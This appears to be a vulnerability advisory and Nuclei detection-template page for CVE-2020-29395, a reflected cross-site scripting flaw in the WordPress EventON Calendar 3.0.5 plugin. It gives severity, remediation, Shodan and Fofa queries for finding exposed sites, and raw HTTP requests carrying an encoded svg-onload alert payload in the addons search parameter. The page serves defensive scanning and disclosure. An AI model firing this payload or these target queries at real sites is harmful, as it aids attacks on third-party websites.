| Title | Wordpress EventON Calendar 3.0.5 - Cross-Site Scripting |
|---|---|
| Author | daffainfo |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions. |
| Remediation | Update to the latest version of the Wordpress EventON Calendar plugin (3.0.6) to mitigate this vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.03284 |
| CVE ID | CVE-2020-29395 |
| CWE ID | CWE-79 |
| Shodan Query | http.html:/wp-content/plugins/eventon/http.html:/wp-content/plugins/eventon-lite/ |
| Fofa Query | wp-content/plugins/eventon/body=/wp-content/plugins/eventon/body=/wp-content/plugins/eventon-lite/ |
| Tags | cve cve2020 wordpress xss wp-plugin packetstorm myeventon vuln |
Wordpress EventON Calendar 3.0.5 is vulnerable to cross-site scripting because it allows addons/?q= XSS via the search field.
GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Accept-Encoding: gzip
GET /addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-29395.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-29395.pcap
N/AN/A